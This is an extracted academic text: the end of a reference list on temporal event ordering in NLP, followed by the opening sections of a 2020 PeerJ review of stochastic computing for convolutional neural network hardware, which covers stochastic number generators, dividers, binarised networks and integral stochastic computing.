Chambers, Taylor Cassidy, Bill McDowell, and Steven Bethard. 2014. Dense Event Ordering with a Multi-Pass Architecture. Transactions of the Associa- tion for Computational Linguistics, 2:273–284. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (almost) from scratch. J. Mach. Learn. Res., 12:2493–2537, November. Savelie Cornegruta and Andreas Vlachos. 2016. Time- line extraction using distant supervision and joint in- ference. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, EMNLP 2016, Austin, Texas, USA, November 1-4, 2016, pages 1936–1942. Quang Xuan Do, Wei Lu, and Dan Roth. 2012. Joint Inference for Event Timeline Construction. In Pro- ceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Compu- tational Natural Language Learning, EMNLP-CoNLL ’12, pages 677–687, Stroudsburg, PA, USA. Associa- tion for Computational Linguistics. Cı́cero Nogueira dos Santos, Bing Xiang, and Bowen Zhou. 2015. Classifying Relations by Ranking with Convolutional Neural Networks. In Proceedings of the 53rd Annual Meeting of the Association for Computa- tional Linguistics and the 7th International Joint Con- ference on Natural Language Processing of the Asian Federation of Natural Language Processing, ACL 2015, July 26-31, 2015, Beijing, China, Volume 1: Long Pa- pers, pages 626–634. Lisa Ferro. 2002. TIDES. Instruction Manual for the Annotation of Temporal Expressions. Technical report, MITRE TECHNICAL REPORT. Oleksandr Kolomiyets, Steven Bethard, and Marie- Francine Moens. 2012. Extracting Narrative Timelines As Temporal Dependency Structures. In Proceedings of the 50th Annual Meeting of the Association for Com- putational Linguistics: Long Papers - Volume 1, ACL ’12, pages 88–97, Stroudsburg, PA, USA. Association for Computational Linguistics. Klaus Krippendorff. 2004. Content Analysis: An In- troduction to Its Methodology (second edition). Sage Publications. Yann Lecun, 1989. Generalization and network design strategies. Elsevier. Omer Levy and Yoav Goldberg. 2014. Dependency- Based Word Embeddings. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics, ACL 2014, June 22-27, 2014, Baltimore, MD, USA, Volume 2: Short Papers, pages 302–308. Anne-Lyse Minard, Manuela Speranza, Eneko Agirre, Itziar Aldabe, Marieke van Erp, Bernardo Magnini, German Rigau, and Ruben Urizar. 2015. SemEval- 2015 Task 4: TimeLine: Cross-Document Event Order- ing. In Proceedings of the 9th International Workshop on Semantic Evaluation, SemEval@NAACL-HLT 2015, Denver, Colorado, USA, June 4-5, 2015, pages 778– 786. James Pustejovsky, Patrick Hanks, Roser Sauri, Andrew See, Robert Gaizauskas, Andrea Setzer, Dragomir Radev, Beth Sundheim, David Day, Lisa Ferro, and Marcia Lazo. 2003. The TIMEBANK Corpus. In Pro- ceedings of Corpus Linguistics 2003, pages 647–656, Lancaster, UK. Nils Reimers and Iryna Gurevych. 2017. Reporting Score Distributions Makes a Difference: Performance Study of LSTM-networks for Sequence Tagging. In Proceed- ings of the 2017 Conference on Empirical Methods in 88 Natural Language Processing (EMNLP), pages 338– 348, Copenhagen, Denmark, September. Nils Reimers, Nazanin Dehghani, and Iryna Gurevych. 2016. Temporal Anchoring of Events for the Time- Bank Corpus. In Proceedings of the 54th Annual Meet- ing of the Association for Computational Linguistics (ACL 2016), volume 1: Long Papers, pages 2195–2204. Association for Computational Linguistics, August. Roser Saurı́, Jessica Littman, Robert Gaizauskas, Andrea Setzer, and James Pustejovsky. 2004. TimeML Anno- tation Guidelines, Version 1.2.1. Nitish Srivastava, Geoffrey Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: A Simple Way to Prevent Neural Networks from Over- fitting. J. Mach. Learn. Res., 15(1):1929–1958, Jan- uary. Jannik Strötgen and Michael Gertz. 2015. A Baseline Temporal Tagger for all Languages. In Proceedings of the 2015 Conference on Empirical Methods in Nat- ural Language Processing, pages 541–547, Lisbon, Portugal, September. Association for Computational Linguistics. Mihai Surdeanu. 2013. Overview of the TAC 2013 Knowledge Base Population Evaluation: English Slot Filling and Temporal Slot Filling. In Proceedings of the TAC-KBP 2013 Workshop, Gaithersburg, Maryland, USA. Naushad UzZaman and James F. Allen. 2010. TRIPS and TRIOS System for TempEval-2: Extracting Tem- poral Information from Text. In Proceedings of the 5th International Workshop on Semantic Evaluation, SemEval ’10, pages 276–283, Stroudsburg, PA, USA. Association for Computational Linguistics. Naushad UzZaman, Hector Llorens, Leon Derczynski, Marc Verhagen, James F. Allen, and James Pustejovsky. 2013. SemEval-2013 Task 1: TempEval-3: Evaluating Time Expressions, Events, and Temporal Relations. In Proceedings of the 7th International Workshop on Se- mantic Evaluation (SemEval 2013), pages 1–9, Atlanta, Gerogia, USA. Marc Verhagen, Robert Gaizauskas, Frank Schilder, Mark Hepple, Graham Katz, and James Pustejovsky. 2007. SemEval-2007 Task 15: TempEval Temporal Rela- tion Identification. In Proceedings of the 4th Inter- national Workshop on Semantic Evaluations, SemEval ’07, pages 75–80, Stroudsburg, PA, USA. Association for Computational Linguistics. Marc Verhagen, Roser Saurı́, Tommaso Caselli, and James Pustejovsky. 2010. SemEval-2010 Task 13: TempEval- 2. In Proceedings of the 5th International Workshop on Semantic Evaluation, SemEval ’10, pages 57–62, Stroudsburg, PA, USA. Association for Computational Linguistics. Katsumasa Yoshikawa, Sebastian Riedel, Masayuki Asa- hara, and Yuji Matsumoto. 2009. Jointly Identifying Temporal Relations with Markov Logic. In Proceed- ings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP: Vol- ume 1, ACL ’09, pages 405–413, Stroudsburg, PA, USA. Association for Computational Linguistics. Daojian Zeng, Kang Liu, Siwei Lai, Guangyou Zhou, and Jun Zhao. 2014. Relation Classification via Convolu- tional Deep Neural Network. In COLING 2014, 25th International Conference on Computational Linguis- tics, Proceedings of the Conference: Technical Papers, August 23-29, 2014, pages 2335–2344, Dublin, Ireland. 89 90 work_lxfkgxtl7za4dgjpbee5atxncy ---- Submitted 4 August 2020 Accepted 1 October 2020 Published 9 November 2020 Corresponding author Zaini Abdul Halim, zaini@usm.my Academic editor Shuihua Wang Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.309 Copyright 2020 Lee and Abdul Halim Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Stochastic computing in convolutional neural network implementation: a review Yang Yang Lee and Zaini Abdul Halim School of Electrical and Electronic Engineering, Universiti Sains Malaysia, Nibong Tebal, Penang, Malaysia ABSTRACT Stochastic computing (SC) is an alternative computing domain for ubiquitous deter- ministic computing whereby a single logic gate can perform the arithmetic operation by exploiting the nature of probability math. SC was proposed in the 1960s when binary computing was expensive. However, presently, SC started to regain interest after the widespread of deep learning application, specifically the convolutional neural network (CNN) algorithm due to its practicality in hardware implementation. Although not all computing functions can translate to the SC domain, several useful function blocks related to the CNN algorithm had been proposed and tested by researchers. An evolution of CNN, namely, binarised neural network, had also gained attention in the edge computing due to its compactness and computing efficiency. This study reviews various SC CNN hardware implementation methodologies. Firstly, we review the fundamental concepts of SC and the circuit structure and then compare the advantages and disadvantages amongst different SC methods. Finally, we conclude the overview of SC in CNN and make suggestions for widespread implementation. Subjects Artificial Intelligence, Computer Architecture, Data Mining and Machine Learning, Embedded Computing, Real-Time and Embedded Systems Keywords Stochastic computing, Convolutional Neural Network, Deep learning, FPGA, IoT INTRODUCTION Deep learning algorithms have been widely and silently integrated into our daily life; for example, image enhancer, voice search and linguistic translation. Meanwhile, the Internet of things (IoT) has gained industrial recognition, and many applications rely on edge computing whereby data are processed on the fly rather than relayed to cloud computing for reliability and security reasons (Naveen & Kounte, 2019). People have been heavily dependent on a widely accessible central processing unit (CPU) and general- purpose graphics processing unit (GPU) for deep learning research and application deployment. Although users strive to achieve great real-time response by offloading many computationally intensive tasks, such as object recognition to edge devices, those computing devices become extremely inefficient despite the utmost priority of power efficiency in IoT. Although the field-programmable gate array (FPGA) and application-specific integrated circuit (ASIC) could overcome the power efficiency issue, economically implementing deep learning hardware logic is not ideal. Thus, researchers are trying to explore alternatives to conventional binary in this specific use case, driving the rise of stochastic computing (SC). How to cite this article Lee YY, Abdul Halim Z. 2020. Stochastic computing in convolutional neural network implementation: a review. PeerJ Comput. Sci. 6:e309 http://doi.org/10.7717/peerj-cs.309 https://peerj.com/computer-science mailto:zaini@usm.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.309 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.309 SC was proposed in the 1960s when the cost of implementing binary computing was prohibitive but soon ran out of favour in the semiconductor industry. Unlike binary computing, SC can perform the arithmetic operation with a single logic gate. The most evident advantage of SC is its ability to reduce the area and power draw by reducing the number of active transistors (De Aguiar & Khatri, 2015). SC is also an inherently progressive precision where the output converges from the most significant figure; thus, SC is capable of making early decision termination (EDT). Power efficiency and EDT capability make deep learning application favourable (Kim et al., 2016), particularly in convolutional neural network (CNN) application. CNN received extensive development since its introduction in 2012 due to its unprecedented performance in object recognition. CNN model development was trending from being deep and massive (highly accurate) to responsive (fast inference). In response to the IoT requirements in edge computing, researchers had attempted to reduce the math precision to save computing resources. With a reasonable trade-off for accuracy, an extreme simplification version of CNN, that is, binarised neural network (BNN), emerged with a promising hardware implementation capability and computing efficiency, rivalling SC methodology. SC in CNN lacks widespread attention due to its cross-disciplinary nature in the computer science study. CNN is impactful in the field of machine learning, but the rising of IoT edge computing which pursues efficient computing pushed back CNN implementation hard. While many researchers focus on innovating CNN algorithms for different use cases such as medicine and agriculture, only a few of them consider how to implement CNN realistically since CNN execution is computationally intensive by itself. Given that no comprehensive and updated review exists on this specific area, in this review paper we thus attempt to investigate and survey the SC implementation in the CNN application. REVIEW METHODOLOGY This review intends to answer the following research questions: (1) What are the major developments of SC elements and SC CNN in recent years? Due to the narrow field of study in SC, the related studies are scattered, let alone the SC in CNN implementation; thus, impede the development of SC CNN without a more centralised reference, increasing difficulty in identifying the research trends. (2) How exactly is the CNN being computed/executed in the stochastic domain? SC is a unique computing methodology which is not often being mentioned in the academic study, despite its unique advantage in the surge of CNN application. Thus, there is a need to have a big picture on the SC CNN mechanism. (3) What are the open problems and/or opportunities to implement SC CNN? SC CNN does have its implementation hurdles. Thus, it is necessary to summarise them before moving forward in this field of research. With the research questions in mind, we first reviewed the basic concepts of SC and CNN in modern perspectives. It is necessary to understand the background of SC and CNN due to the vastly different field of studies between them. Moreover, there is a need to Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 2/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 aggregate the knowledge of SC elements in the face of rising trends in SC developments. Then we examined the recent developments and contributions of SC in CNN computation and compared the implementation methodologies across various recent studies. Finally, we made a conclusion and some suggestions for the future of deep learning research in the SC domain. Search criteria An initial search was carried out to identify an initial set of papers which have the prior works on SC and CNN in hardware implementation. The search strings were then inferred and developed as follows: (‘Stochastic computing’) OR (‘Stochastic computing deep learning’) OR (‘Stochastic computing convolutional neural network’) OR (‘Stochastic computing neural network’) OR (‘Stochastic computing image processing’) ‘Stochastic’ alone has a lot of meaning in a wide area of study. Thus, the keyword of ‘Stochastic computing’ is a necessity to narrow down the search scope. The search strings were applied to the indexed scientific database Scopus and Web of Science (peer-reviewed). Domain-oriented databases (ACM Digital Library, IEEE Xplore Digital Library) were also referred extensively. Finally, Google Scholar (limited to peer-reviewed papers) were used to find any omitted academic literature, especially in this multi-disciplinary search scope. Peer-reviewed articles were preferred to ensure only confirmed works were to be summarised in this review paper. Scope of review Notably, SC is not the only methods existed for efficient CNN computing. We only cover the topics of SC and SC related to CNN computing in this review study. Many articles may not directly involve CNNs, but their novel SC elements are worthy as part of the significant SC developments and potentially useful for the future SC CNN function blocks, thus, will be mentioned in this review. Some elemental studies on CNNs were referred to understand the nature of CNN algorithms better. Some surveys on CNN implementation in FPGA merely or never discuss the SC, but they shared a similar concern on efficient CNN computation. Thus, their surveys were also considered and referred to in this review study if any. BASIC CONCEPTS SC and CNN are different fields of studies and worth a separate explanation. Thus, SC will be described first, then secondly CNN and BNN will be explained. Lastly, the competitive relationship between SC and BNN implementations will be discussed. SC is a unique concept of computing relative to traditional binary computing and has to be understood before an in-depth discussion on SC implementation in CNN at the next section. SC SC is favourable in IoT application due to its extreme simplicity of computing elements, where power efficiency is of utmost priority. Unlike deterministic computing that tolerates Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 3/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 x>y y x Comparator Stochastic logic circuits outstream Counter Random number generator Binary number Binary number Binary domain Stochastic domain Binary domain Stochastic bitstream Figure 1 Process of SC and its elements. Full-size DOI: 10.7717/peerjcs.309/fig-1 10011010 (4/8) 01101010 (4/8) S1 S2 00001010 (2/8) S3 S1 S2 D C ENB Multiplexer 10100110 (4/8) 11011011 (6/8) 10011010 (4/8) 10110011 (5/8)S1 S2 S3 S4 00100100 (2/8) 01101001 (4/8) S1 S2 00100000 (1/8) S3 00100100 (2/8) 11001001 (4/8) S1 S2 00000000 (0/8) S3 A B C D Figure 2 SC arithmetic operation. (A)AND gate as SC unipolar multiplier. (B) MUX as SC scaled adder. (C) Uncorrelated bit streams give accurate output. (D) Correlated bit streams give inaccurate output. Full-size DOI: 10.7717/peerjcs.309/fig-2 absolutely no error, SC allows errors to a certain degree, thus the name approximate computing. SC initially decodes a binary number into a bitstream in such a way that the frequency of 1’s bit represents the magnitude of value. For example, [0,0,0,0,0,1,1,1] stochastic stream is equal to 3/8 or 0.375 because it has three 1’s bits. Then, the number can be computed in the stochastic domain with a simple logic gate instead of gate combinations in the binary domain. Finally, the stochastic stream will be converted back to binary numbers with a simple counter by counting the frequency of 1’s bit, as shown in Fig. 1. SC took advantage of probability math to reduce the logic components required to perform an arithmetic operation. Taking Figs. 2A and 2B as examples, in the AND gate multiplication operation, the output can be defined as: S3=P(S3)=P(S1)P(S2)=S1×S2. (1) In the case of addition operation, the output will be scaled by half with MUX select input with a bitstream value of 0.5. The MUX scaled adder can be defined as: S4=P(S3)P(S1)+(1−P(S3))P(S2)= P(S1)+P(S2) 2 = S1+S2 2 ,P(S3)=0.5, (2) Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 4/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-1 https://doi.org/10.7717/peerjcs.309/fig-2 http://dx.doi.org/10.7717/peerj-cs.309 where P is the probability of the stochastic stream. The AND gate multiplier only applies to unipolar math where the real number ∈ [0,1]. In the case of bipolar math where real number ∈ [−1,1] (0’s bit decodes as −1), the XNOR gate can be used as a multiplier, whereas the same MUX can function as a bipolar adder. The stochastic number generator (SNG) becomes the heart of the SC to perform arithmetic operations in the stochastic domain. SNG consists of a random number generator (RNG) and a comparator; both worked synchronously to generate stochastic bitstream from a given binary number. However, the RNG was the biggest challenge in the previous SC circuit design because the correlation between the operating bitstreams plays a great role in SC accuracy. An SC output will be accurate only if both working streams are not correlated. Taking Figs. 2C and 2D as examples, [0,1,1,0,1,0,0,1] and [1,1,0,0,1,0,0,1] bitstreams can represent the value of 4/8, but the output on Fig. 2D is far from accurate due to a high correlation to the opposite bitstream. The correlation index of both bitstreams can be defined as: n∑ i=1 S1(i)S2(i)= ∑n i=1S1(i)× ∑n i=1S2(i) n , (3) where ‘S’ is the respective stochastic bitstream and ‘n’ is the bit length. Thus, the accuracy is highly dependent on the randomness and the lengths of the stochastic stream. Nevertheless, not all of the SC elements are sensitive to stochastic correlation such as MUX scaled adder (Alaghi, Qian & Hayes, 2018). Presently, a pseudo-random RNG called a linear-feedback shift register (LFSR) is widely accepted due to its simple design and effectiveness in lowering bitstream correlation (Alaghi & Hayes, 2013). LFSR consists of a feedback XOR gate and a bit shift register as shown in Fig. 3A. The register will be initialised with a specific value, and then, the register will generate pseudo-random binary values in every bit shifting clock cycle. The binary number generated from RNG will be compared with the user input binary number. Two circuits can be used as a comparator, namely, binary comparator and weighted binary generator (WBG) as shown in Figs. 3B and 3C respectively. Both are capable of generating stochastic bitstream. After the stochastic stream passed through the stochastic logic circuits, the computed stochastic streams can be converted back to the binary domain by using a simple flip-flop counter. SC never stops improving and keep achieving great accuracy whilst using less area and power. SNG is the major overhead of the SC circuit. As such, Ichihara et al. (2014) proposed a circular shifting technique to share LFSR. Then, (Kim, Lee & Choi, 2016a) proposed a method very similar to memoisation computing to reduce the number of LFSRs in large scale SC. Xie et al. (2017) attempted to share LFSR with wire exchange technique with additional random bit flip, whereas Joe & Kim (2019) proposed symmetrical exchange of odd wire and even wire. Even better, Salehi (2020) showed that simple wire permutation paired with WBG could deliver the lowest correlation index, thus achieving great accuracy whilst requiring fewer logic gates. Interestingly, Chen, Ting & Hayes (2018) replaced LFSR with up-counter in conjunction with WBG to take advantage of WBG binary weighting characteristics to assure SC progressive precision behaviour. As such, zero-error EDT is Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 5/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 1000 L3 L2 L1 L0 L3 X3 L2 X2 L1 X1 L0 X0 Stochastic bitstream L3 L2 L1 L0 X3 X2 X1 X0 Stochastic bitstream A C B Figure 3 SNG components. (A) RNG with LFSR. (B) True comparator. (C) WBG. Full-size DOI: 10.7717/peerjcs.309/fig-3 achievable without extra hardware cost. The WBG could also be shared partially because some WBG logics could be redundant (Yang et al., 2018). More advanced operations, such as square, division and non-linear functions, had also gained attention and innovations to fit modern applications. The stochastic square is already in its simplest form as shown in Fig. 4A. Squaring stochastic stream can be conducted by delaying the input stream with D flip-flop before multiplying itself. In the case of a non-linear function, such as hyperbolic tangent (TanH), stochastic TanH (Stanh) uses k-state finite state machine (FSM), such as that in Fig. 4B. FSM is a class of logic circuits that will have a specific logical output pattern only if the input reached a designated sequential threshold. Stanh function can be described as: Stanh(K,x)= tanh ( Kx 2 ) , (4) where K is the number of states (must be multiples of 2) and x is the input stream. Brown & Card (2001) showed that Stanh function responds closely to the true TanH function with K =16. However, too many states will result in random walk behaviour (Kim et al., 2016); thus, an optimum amount of state for accurate reproduction of TanH function Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 6/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-3 http://dx.doi.org/10.7717/peerj-cs.309 Q Q SET CLR D X Y=X 2 clk S0 S1 Sn/2‐1 Sn Sn‐1 Sn/2 X’ X X’ X X X’ X’ X X X X’ X’ Y=0 Y=1 A B Figure 4 SC with advance arithmetic operations. (A) Stochastic squaring with D flip-flop. (B) K-state FSM for Stanh function which will be widely utilised in SC CNN. Full-size DOI: 10.7717/peerjcs.309/fig-4 exists in the stochastic domain. An improvement in FSM design can also emulate linear and exponential functions (Najafi et al., 2017). The real challenge in SC (also the missing part of SC) is the stochastic divider design. Stochastic division traditionally used FSM with extra SNG components for gradient descent approach as shown in Figs. 5A and 5B, but the gradient descent convergence time incurred inaccuracy on the output. Newer SC divider from Chen & Hayes (2016) exploited the stochastic correlation properties to perform stochastic division without using expensive SNG as shown in Figs. 5C and 5D. This event is possible because if stochastic stream p(x) and p(y) are perfectly correlated, and p(x)<p(y), then by probability math: p(x =1,y =1)=p(x =1). (5) Given that conditional probability p(x =1|y =1) (probability of x =1 given that y =1) can also be expressed as: p(x =1|y =1)= p(x =1,y =1) p(y =1) = p(x) p(y) , (6) the desired divider function on the SC domain is derived as a result. Hence, the stochastic division can be performed if both stochastic streams are perfectly correlated by evaluating the conditional probability of x and y. In the case of p(x)>p(y), the output will be clipped to a value of 1. Chu (2020) improved the circuit by using JK flip-flop, but only for unipolar SC division. The overall structure of SC is thus explained. Other than the benefit of power efficiency, SC is also inherently error resilient where accidental bit flips will not affect the overall operation of the stochastic circuits; otherwise, it could be catastrophic in deterministic computing. Secondly, SC is inherently progressive precision whereby the output value converges from the most significant figures. For instance, if the output is 0.1234, then ‘0.1...’ will show first in the stochastic compute cycles instead of ‘...4’ in the conventional binary. This characteristic is useful in specific applications, such as weather forecasting, where only the most significant figure matters in decision making. Thus, performing EDT in SC without waiting for complete computation is possible. With that said, its simplicity Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 7/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-4 http://dx.doi.org/10.7717/peerj-cs.309 SNG SNG SNGout down up counter X1 X2 PX1 PX2 Binary gradient descent PX1/X2 SNG SNG SNGout down up counterX1 X2 PX1 PX2 Binary gradient descent PX1/X2 Q Q SET CLR D clk PX2 2 PX1PX2 ‐ZPX2 2 Z u1 LFSR x1 comparator u2 LFSR x2 comparator LFSR X1 X2 S1 S2 D C ENB Multiplexer Q Q SET CLR D PX1 PX2 PX1/X2 clk u1 LFSR x1 comparator u2 LFSR x2 comparator LFSR X1 X2 S1 S2 D C ENB Multiplexer Q Q SET CLR D PX1 PX2 |PX1/X2| clk S1 S2 D C ENB Multiplexer 0.5 0.5(PX1+PX2) Sign(X1) Sign(X2) PX1/X2 A B C D Figure 5 SC divider circuits. (A) Former gradient descent unipolar divider. (B) Former SC bipolar di- vider. (C) Newer SC unipolar divider by exploiting correlation. (D) Newer SC bipolar divider by adding sign information. Full-size DOI: 10.7717/peerjcs.309/fig-5 did come at a cost. Increasing math precision in SC also requires long bit lengths, thus increasing computing time latency by 2n folds. For instance, doubling numerical precision from 4 to 8 bits requires increasing bit length from 24=16 bits to 28=256 bits, or 24 times exponential increase in computing latency. SC becomes unfavourable to modern computation needs due to the ever-increasing efficiency in binary computing. Nevertheless, certain niche applications can still benefit from SC topology, such as a low-density parity-check decoder in a noisy data-transmission environment; very robust image processing tasks, such as gamma correction and Sobel edge detection (Joe & Kim, 2019); and the recent interest in CNN algorithm. CNN With the advancement of computing technology, many applications are getting highly reliant on probabilistic computation. Deep neural network (DNN) is a widely accepted class of machine learning algorithms to process complex information, such as images and videos. The nature of DNN consists of layers of addition and multiplication of numerical weights that end up computing the overall dimensionless probability values of an output class, which in turn allows the computer to decide based on the output value. Many DNN algorithm variations exist, each for a particular purpose, such as CNN for image processing and long short-term memory for neural-linguistic processing. CNN, for example, can reduce multidimensional images into simple classes; thus, CNN is very popular in image classification and object recognition. The most distinctive component that discriminates CNN from other DNN algorithms is its convolution layer. CNN can reduce large matrices into a single value representation, as shown in Fig. 6A, which explains its superior capability of dimensional reduction in image Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 8/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-5 http://dx.doi.org/10.7717/peerj-cs.309 X l‐1 W l‐1 X l Neuron model f(∑WiXi + b) W2X2 f(X) Class 1x1 1x32x32 4x28x28 4x14x14 16x10x10 16x5x5 1x64 5x5 convolution 2x2 subsampling 5x5 convolution 2x2 subsampling Fully connected A B C Flatten Figure 6 CNN’s convolution and activation. (A) Matrix convolution. (B) Neural network model after the convolution. (C) Architecture of classical LeNet-5 CNN. Full-size DOI: 10.7717/peerjcs.309/fig-6 processing. The convolution process can be generalised as: ylj = f ( xlj ) = f ( n∑ i=1 ( xl−1i ×w l−1 ij ) +blj ) , (7) where xlj is the convolved feature of the next layer, x l−1 i is the feature from the previous layer, wl−1ij is the kernel weight matrix, and b l j is bias. ‘l’ is the layer number, ‘i’ denotes scan window number, ‘n’ is the total number of scan window, and ‘j’ is the depth of next feature map. After the convolution, the activation function f ( xlj ) exists, which can be a linear or non-linear function. Rectified linear unit (ReLU) and Tanh are just the names of a few popular activation functions. The final product ylj will be aggregated, and the process repeats, depending on the structure of the CNN model. The convolution and activation layers are fundamental in CNN, albeit other optional layers exist, such as normalisation layer (to reduce output variance) (Ioffe & Szegedy, 2015), pooling layer (to save memory), and dropout layer (to prevent overfitting) (Hinton et al., Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 9/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-6 http://dx.doi.org/10.7717/peerj-cs.309 2012). At the end of convolution, the convolved pixel matrix will be flattened into a single list of data. Then, those data will be fed to a highly traditional biological neuron-inspired model, so-called fully connected neuron or dense layer, as shown in Fig. 6B. Moreover, multiplication and addition repeat until the model converges to the size of the desired class output. A simple LeNet-5 model (Liew et al., 2016) as depicted in Fig. 6C shows the end-to-end structure of a typical CNN, from the input image to output class. Its cascaded arithmetic operation is where the CNN algorithm execution stressed the modern processor. It either spends too much processor time to serialise the process, or taking many hardware resources for parallelisation. The convolution arithmetic does multiplication and addition exhaustively. If the matrices of scanning windows are large or the network is deep/wide, then the computational demands required are high. As the multiplication and accumulation operations increase, memory access bottlenecking becomes the major limitation for DNNs (Capra et al., 2020). Traditional computing also uses floating-point units (FPU) which takes a wide area with high power consumption due to the colossal amount of logic gates involved. As the edge computing gains interest as the future trends of computation, energy efficiency has become a major concern for the CNN development and urged the researchers to rethink another way to process the information efficiently. Most of the modern FPU is of 32-bit floating-point (full precision). Thus, reducing the precision to 16 bits (half precision) or lower is one of the ways to improve CNN computation efficiency without much accuracy degradation. BNN In an extreme case, the parameters are reduced to only a single bit representation. This radical simplification of CNN is called BNN and gained attention among researchers in the industry due to its compactness in memory usage and practicality (Simons & Lee, 2019). In BNN, the parameters can only have two possible values, that is, −1 or 1. Despite some considerable degree of accuracy degradation, BNN does have several unique advantages. First is its model size; for instance, 64 MB of parameter data can be reduced to 2 MB, thus allowing the deployment of small embedded systems. Its little memory usage also allows memory-centric computing where the parameters can be stored directly beside the processing elements, thereby speeding up the computation by eliminating data communication cost (Angizi & Fan, 2017). Second is its hardware implementation capability. BNN requires some amount of arithmetic logic unit (ALU) to process fixed-point image data at the frontend (still cost less than FPU). However, the multiplication of the hidden layer can be simply an array of XNOR gates because the multiplication of −1 and 1 is of bipolar math. The high hardware utilisation of BNN in FPGA results in high throughput, whereas being an order of magnitude if not more energy-efficient than CPU and GPU despite lower clock speed (Nurvitadhi et al., 2017). Another unique advantage is that BNN is less susceptible to adversarial attack with stochastic weight quantisation in the hidden layer (Galloway, Taylor & Moussa, 2018). The adversarial attack is where data, for example, an image, are injected with noise and adversely affect the output class decision of a fine-tuned CNN model, albeit the doctored image has no perceptual difference to human eyes. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 10/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 However, non-linear functions become useless due to the extreme information loss by the parameter quantisation. Instead, a threshold function can simply replace the normalisation and activation functions (Simons & Lee, 2019). The BNN also suffer accuracy degradation from highly challenging datasets, such as ImageNet classification, due to extreme information loss. As many studies explore for better BNN optimiser algorithms, Zhu, Dong & Su (2019) found that training optimisers might not help much due to BNN insensitivity to small changes in value. Instead, BNNs in parallel with ensemble technique (multiple trained BNNs in parallel and final decision with a majority vote) is a perfect fit, improving the overall BNN accuracy on large image classification datasets. SC CNN vs BNN The evolution of CNN to BNN challenged the idea of SC due to the competitiveness in hardware implementation capability. SC implementation is technically more challenging than BNN due to various custom logics and substantial uncertainty in future community support. After all, SC is still at its infancy in the CNN domain. Regardless of the different intentions and directions of development of SC and BNN, both studies try to explore alternatives for a highly efficient computing paradigm in the future of the IoT edge computing. With the massive exploitation and integration of DNN algorithms into small or remote devices, such as a smartwatch or surveillance camera, both fields of studies will contribute to the development of a highly realistic edge computing ecosystem. SC implementation in CNNs SC is considered the next frontier in energy-efficient edge computing (Jayakumar et al., 2016) due to its energy-efficient operation and ability to tolerate errors in domains of recognition, vision, data mining and so on. Meanwhile, many applications attempt to offload challenging workloads from cloud computing to edge devices. Thus, SC had become the hotspot of research interest. Integral SC: a radical change in SC methodology for the sake of CNN CNN is very popular in vision application due to its simplicity and accuracy. However, SC does not provide out-of-box experience as SC is not yet customised and explicitly optimised for the CNN algorithm. Hence, Ardakani et al. (2017) proposed a radical idea to use an integer stream instead of the traditional bitstream. The stochastic byte is∈ [0,1,2...] so that to repurpose simple binary multiplier and bitwise AND as shown in Figs. 7B and 7C to process integer number in the stochastic domain, or integral SC. The idea is to preserve information across different precisions within a limited stochastic length. The effect of information loss becomes apparent when many MUX half-adding many stochastic streams exist together. The resultant precision requirements will only increase and require long overall bitstreams to preserve the precision of the half-added stochastic number. For example, a value of 0.5625 (9/16) requires a 16-bit length stochastic stream, whereas 0.875 (7/8) only requires 8-bit length. Although 0.875 can be expressed in 16-bit length, half-adding both numbers result in 0.71875 (23/32), or at least 32-bit length to preserve the output precision in the stochastic domain. If so, the overall stochastic bit length will need to be extended to 32-bit length. Cascading MUX adders in the CNN convolution Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 11/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 u1 x2 x1 Integral SC Elements 01001011 101010110.5625 = 11102022 0.875 = 11110111 Binary multiplier 8/8 = 20110211 10/8 = 12201202 10/8 = 20200402 S1 S2 D C ENB Multiplexer 0 12/8 = 12221202 2/8 = 10010000 3/8 = 10020000 S X S X S X Integral SC AND S X Integral SC AND S X Integral SC AND S X Integral SC AND S X Integral SC AND S X Tree Adder NStanh Stochastic bitstream binary binary A B C D Integral SC Neuron Figure 7 Integral SC methodology. (A) High precision stochastic number can be represented with shorter stream length with integer value. (B) Binary radix multiplier as integral SC scaled adder. (C) Modified MUX as integral SC multiplier. (D) Integer SC neuron block. Full-size DOI: 10.7717/peerjcs.309/fig-7 stage will drive up the bit length requirements drastically, thus incurring considerable computational latency. The same problem also applies to the multiplier. Then, the integral SC comes into play. Take Fig. 7A as an example. A value of 0.5625 can be effectively represented in the same length as the 8-bit length value of 0.875. Given that integral SC can preserve the stochastic information in an integer value, the final batch adding operation in CNN can be processed with tree adder as shown in Fig. 7D, 